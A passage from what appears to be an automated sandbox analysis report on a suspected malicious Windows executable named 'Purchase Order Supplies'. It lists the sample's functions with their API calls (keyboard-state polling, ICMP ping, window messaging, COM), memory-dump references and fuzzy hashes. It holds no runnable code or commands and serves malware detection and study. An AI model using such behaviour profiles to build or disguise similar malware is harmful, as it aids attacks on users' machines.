                          • __swprintf.LIBCMT ref: 00C984E5
                          • __itow.LIBCMT ref: 00C98519
                            • Part of subcall function 00CB2177: _xtow@16.LIBCMT ref: 00CB2198
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: __itow__swprintf_xtow@16
                          • String ID: %.15g$0x%p$False$True
                          • API String ID: 1502193981-2263619337
                          • Opcode ID: 0852375887fbafd2d251570d89efb2dd072fd8daca6affa4ab3620b1db0b02e1
                          • Instruction ID: 5ed5df5ec9517e3b180257ff1e45a7e8265429329ff1be756d3da276d9e894c2
                          • Opcode Fuzzy Hash: 0852375887fbafd2d251570d89efb2dd072fd8daca6affa4ab3620b1db0b02e1
                          • Instruction Fuzzy Hash: 6F41F3716006059BEF24DF38EC45FAA73E9BF45300F24446AE94AD7196EA31DA45EB20
                          Function 00CB5C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00CB5CCA
                            • Part of subcall function 00CB889E: __getptd_noexit.LIBCMT ref: 00CB889E
                          • __gmtime64_s.LIBCMT ref: 00CB5D63
                          • __gmtime64_s.LIBCMT ref: 00CB5D99
                          • __gmtime64_s.LIBCMT ref: 00CB5DB6
                          • __allrem.LIBCMT ref: 00CB5E0C
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB5E28
                          • __allrem.LIBCMT ref: 00CB5E3F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB5E5D
                          • __allrem.LIBCMT ref: 00CB5E74
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CB5E92
                          • __invoke_watson.LIBCMT ref: 00CB5F03
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                          • String ID:
                          • API String ID: 384356119-0
                          • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                          • Instruction ID: 2bc45540cf5f28ce4bc9ec82a2b461ada273ed7b3db7c62daed1101d6c862e84
                          • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                          • Instruction Fuzzy Hash: 4771F871E01B16ABE714AF78CC81BEAB7B9AF14724F144229F910E7681E774DF409B90
                          Function 00CD57FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00CD5816
                          • GetMenuItemInfoW.USER32(00D518F0,000000FF,00000000,00000030), ref: 00CD5877
                          • SetMenuItemInfoW.USER32(00D518F0,00000004,00000000,00000030), ref: 00CD58AD
                          • Sleep.KERNEL32(000001F4), ref: 00CD58BF
                          • GetMenuItemCount.USER32(?), ref: 00CD5903
                          • GetMenuItemID.USER32(?,00000000), ref: 00CD591F
                          • GetMenuItemID.USER32(?,-00000001), ref: 00CD5949
                          • GetMenuItemID.USER32(?,?), ref: 00CD598E
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CD59D4
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD59E8
                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CD5A09
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                          • String ID:
                          • API String ID: 4176008265-0
                          • Opcode ID: 2c22effc3a83e69838c2050894f52c1556757b2f526fe40bba1d716c5fef2b3a
                          • Instruction ID: 47e5509ea2bf8b3d84a4bc528a78dcdd03e0473e51d1da6d29650d2c6263d9fc
                          • Opcode Fuzzy Hash: 2c22effc3a83e69838c2050894f52c1556757b2f526fe40bba1d716c5fef2b3a
                          • Instruction Fuzzy Hash: C561AE70900759EFDB10CFA4C898EBE7BBAEB01318F14411AEA51E7391D731AE02DB20
                          Function 00CF9A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CF9AA5
                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CF9AA8
                          • GetWindowLongW.USER32(?,000000F0), ref: 00CF9ACC
                          • _memset.LIBCMT ref: 00CF9ADD
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CF9AEF
                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CF9B67
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$LongWindow_memset
                          • String ID:
                          • API String ID: 830647256-0
                          • Opcode ID: 8d37d1aea0bfc88f6b616c085c0add83889d4f34f60edd5df20ec2795160670b
                          • Instruction ID: c1a9f32c52e7dd021f4ed9ea93c3614b5af20006ee40c64ae03bc6a702ffb50e
                          • Opcode Fuzzy Hash: 8d37d1aea0bfc88f6b616c085c0add83889d4f34f60edd5df20ec2795160670b
                          • Instruction Fuzzy Hash: DD612A75900208AFDB21DFA8CC81FEE7BB8EB09710F144159FA15E72A1D770AE45DB61
                          Function 00CD3569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00CD3591
                          • GetAsyncKeyState.USER32(000000A0), ref: 00CD3612
                          • GetKeyState.USER32(000000A0), ref: 00CD362D
                          • GetAsyncKeyState.USER32(000000A1), ref: 00CD3647
                          • GetKeyState.USER32(000000A1), ref: 00CD365C
                          • GetAsyncKeyState.USER32(00000011), ref: 00CD3674
                          • GetKeyState.USER32(00000011), ref: 00CD3686
                          • GetAsyncKeyState.USER32(00000012), ref: 00CD369E
                          • GetKeyState.USER32(00000012), ref: 00CD36B0
                          • GetAsyncKeyState.USER32(0000005B), ref: 00CD36C8
                          • GetKeyState.USER32(0000005B), ref: 00CD36DA
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 2b67580bd95ad15c189a6659bc821691a0208f0150c77263af14532de6b1b767
                          • Instruction ID: 47ad268e540b4d8ef8c84d48dc100817ba90c2dedf7f51e607ee8e6cbde48519
                          • Opcode Fuzzy Hash: 2b67580bd95ad15c189a6659bc821691a0208f0150c77263af14532de6b1b767
                          • Instruction Fuzzy Hash: 3E418260508BC97DFF319B6498143A5BEA17B12344F08805BE7D6563C2EBA4DBC9CB63
                          Function 00CCA28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                          Download Yara Rule
                          APIs
                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00CCA2AA
                          • SafeArrayAllocData.OLEAUT32(?), ref: 00CCA2F5
                          • VariantInit.OLEAUT32(?), ref: 00CCA307
                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 00CCA327
                          • VariantCopy.OLEAUT32(?,?), ref: 00CCA36A
                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 00CCA37E
                          • VariantClear.OLEAUT32(?), ref: 00CCA393
                          • SafeArrayDestroyData.OLEAUT32(?), ref: 00CCA3A0
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CCA3A9
                          • VariantClear.OLEAUT32(?), ref: 00CCA3BB
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00CCA3C6
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                          • String ID:
                          • API String ID: 2706829360-0
                          • Opcode ID: 8c493eecbeabaf2cec7861325dfcdc8c0ac20879f5453d60ce92e8a7d07cc94b
                          • Instruction ID: cec201f961e6c6ded2c0d96b928649f50c2e6e60c3b4a67f09cd928340f10d0b
                          • Opcode Fuzzy Hash: 8c493eecbeabaf2cec7861325dfcdc8c0ac20879f5453d60ce92e8a7d07cc94b
                          • Instruction Fuzzy Hash: F8411B71900219ABDB01DFA4D888DDEBBB9FF48308F108069E555E7261DB34AA46DBA1
                          Function 00CEB250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C984A6: __swprintf.LIBCMT ref: 00C984E5
                            • Part of subcall function 00C984A6: __itow.LIBCMT ref: 00C98519
                          • CoInitialize.OLE32 ref: 00CEB298
                          • CoUninitialize.COMBASE ref: 00CEB2A3
                          • CoCreateInstance.COMBASE(?,00000000,00000017,00D1D8FC,?), ref: 00CEB303
                          • IIDFromString.COMBASE(?,?), ref: 00CEB376
                          • VariantInit.OLEAUT32(?), ref: 00CEB410
                          • VariantClear.OLEAUT32(?), ref: 00CEB471
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                          • API String ID: 834269672-1287834457
                          • Opcode ID: 688084189d7acec1c052117e915260c2d5f1122e54db9111ac76af2fb621a78a
                          • Instruction ID: 5e07280e3df99e63b627f5224d1c3a120ca7d94f4e08aa50de954413c55bc839
                          • Opcode Fuzzy Hash: 688084189d7acec1c052117e915260c2d5f1122e54db9111ac76af2fb621a78a
                          • Instruction Fuzzy Hash: D9619D71204341AFC710DF56C889B6FB7E8AF89714F10481DFA959B2A1DB70EE49CB92
                          Function 00CE8694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                          Download Yara Rule
                          APIs
                          • WSAStartup.WS2_32(00000101,?), ref: 00CE86F5
                          • inet_addr.WS2_32(?), ref: 00CE873A
                          • gethostbyname.WS2_32(?), ref: 00CE8746
                          • IcmpCreateFile.IPHLPAPI ref: 00CE8754
                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00CE87C4
                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00CE87DA
                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00CE884F
                          • WSACleanup.WS2_32 ref: 00CE8855
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                          • String ID: Ping
                          • API String ID: 1028309954-2246546115
                          • Opcode ID: 2e7fe51a468303a0299886de695259f234d17842aca85a516f0ba2adaf0bd5e6
                          • Instruction ID: a61d98c22e224eb4d31d5d18548c426335359933c22eaecb4aea905ed45e5bf1
                          • Opcode Fuzzy Hash: 2e7fe51a468303a0299886de695259f234d17842aca85a516f0ba2adaf0bd5e6
                          • Instruction Fuzzy Hash: 5F519231604341AFDB20DF26CD45B6A77E4AB48710F14892AF96AD72E1DF30E905DB51
                          Function 00CDEC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 00CDEC1E
                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00CDEC94
                          • GetLastError.KERNEL32 ref: 00CDEC9E
                          • SetErrorMode.KERNEL32(00000000,READY), ref: 00CDED0B
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Error$Mode$DiskFreeLastSpace
                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                          • API String ID: 4194297153-14809454
                          • Opcode ID: 9509d0f2aef267467d98166aa7e40354c4f451d771bdc57d8249d6823e628ece
                          • Instruction ID: c3298ba3898e571ee455096571cd657d5653d6cb325ddc97dc09b4952e350969
                          • Opcode Fuzzy Hash: 9509d0f2aef267467d98166aa7e40354c4f451d771bdc57d8249d6823e628ece
                          • Instruction Fuzzy Hash: 42319035A00205AFCB11EF68C989AAEB7B4EF84740F108066E615EB391DB719A42DB91
                          Function 00CCC6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00CCC782
                          • GetDlgCtrlID.USER32 ref: 00CCC78D
                          • GetParent.USER32 ref: 00CCC7A9
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CCC7AC
                          • GetDlgCtrlID.USER32(?), ref: 00CCC7B5
                          • GetParent.USER32(?), ref: 00CCC7D1
                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00CCC7D4
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 313823418-1403004172
                          • Opcode ID: cc95ea6fced384a730be49602f019e0adfea94973041627fed8e2c10be874318
                          • Instruction ID: cff1e3d3ccc5b22e585a80544d77900d586165bfdd4ad04143c4aa5640e4e136
                          • Opcode Fuzzy Hash: cc95ea6fced384a730be49602f019e0adfea94973041627fed8e2c10be874318
                          • Instruction Fuzzy Hash: D2218E74900208BFDF05AB64CCC5EFEB7A6EB45310F144119F566D32E1DB785916AB20
                          Function 00CCC7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00CCC869
                          • GetDlgCtrlID.USER32 ref: 00CCC874
                          • GetParent.USER32 ref: 00CCC890
                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00CCC893
                          • GetDlgCtrlID.USER32(?), ref: 00CCC89C
                          • GetParent.USER32(?), ref: 00CCC8B8
                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00CCC8BB
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: MessageSend$CtrlParent$_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 313823418-1403004172
                          • Opcode ID: eb25be1988e8bbcc866ed9dd569c21a1be1c3779d24d9fc3dba59e959550002e
                          • Instruction ID: 2dfa7c5f2ac672703bae366aea27aa2f11fd2050f14fab10e040f8b3b1e44c09
                          • Opcode Fuzzy Hash: eb25be1988e8bbcc866ed9dd569c21a1be1c3779d24d9fc3dba59e959550002e
                          • Instruction Fuzzy Hash: A721AF71A00208BFDF01ABA4CCC5EFEBB69EB45300F104015F515E32E1DB78991AAB20
                          Function 00CCC8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetParent.USER32 ref: 00CCC8D9
                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00CCC8EE
                          • _wcscmp.LIBCMT ref: 00CCC900
                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00CCC97B
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ClassMessageNameParentSend_wcscmp
                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                          • API String ID: 1704125052-3381328864
                          • Opcode ID: df0f307625de905692d09df902bb4e5b3ef1e7389a5ffc2c2e8ecc41d8dda54a
                          • Instruction ID: 3608fe2dcac00def7bff6be79cbeef2b6acb926a6a1b117d659716f2534df2cc
                          • Opcode Fuzzy Hash: df0f307625de905692d09df902bb4e5b3ef1e7389a5ffc2c2e8ecc41d8dda54a
                          • Instruction Fuzzy Hash: 0411E976648306BFFA052A30EC4AEF677ACDF06764F20001AF918E50D6FF7169125564
                          Function 00CDB05A Relevance: 15.3, APIs: 10, Instructions: 317COMMON
                          Download Yara Rule
                          APIs
                          • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00CDB137
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: ArraySafeVartype
                          • String ID:
                          • API String ID: 1725837607-0
                          • Opcode ID: 1a1394b4db236931fc3401ae61adcdb3ad1d2dcc515b2a215838ff3ecd6de245
                          • Instruction ID: 5cab34179fedf7233fe95caaca0ab6ba44108659e39821ef1bf849b3a527590b
                          • Opcode Fuzzy Hash: 1a1394b4db236931fc3401ae61adcdb3ad1d2dcc515b2a215838ff3ecd6de245
                          • Instruction Fuzzy Hash: 69C17AB5A0121ADFDB04DF98C485BAEB7F4EF08315F21406AE615E7391DB34AE81DB90
                          Function 00CBBA66 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                          Download Yara Rule
                          APIs
                          • __lock.LIBCMT ref: 00CBBA74
                            • Part of subcall function 00CB8984: __mtinitlocknum.LIBCMT ref: 00CB8996
                            • Part of subcall function 00CB8984: RtlEnterCriticalSection.NTDLL(00CB0127), ref: 00CB89AF
                          • __calloc_crt.LIBCMT ref: 00CBBA85
                            • Part of subcall function 00CB7616: __calloc_impl.LIBCMT ref: 00CB7625
                            • Part of subcall function 00CB7616: Sleep.KERNEL32(00000000,?,00CB0127,?,00C9125D,00000058,?,?), ref: 00CB763C
                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00CBBAA0
                          • GetStartupInfoW.KERNEL32(?,00D46990,00000064,00CB6B14,00D467D8,00000014), ref: 00CBBAF9
                          • __calloc_crt.LIBCMT ref: 00CBBB44
                          • GetFileType.KERNEL32(00000001), ref: 00CBBB8B
                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00CBBBC4
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmpDownload File
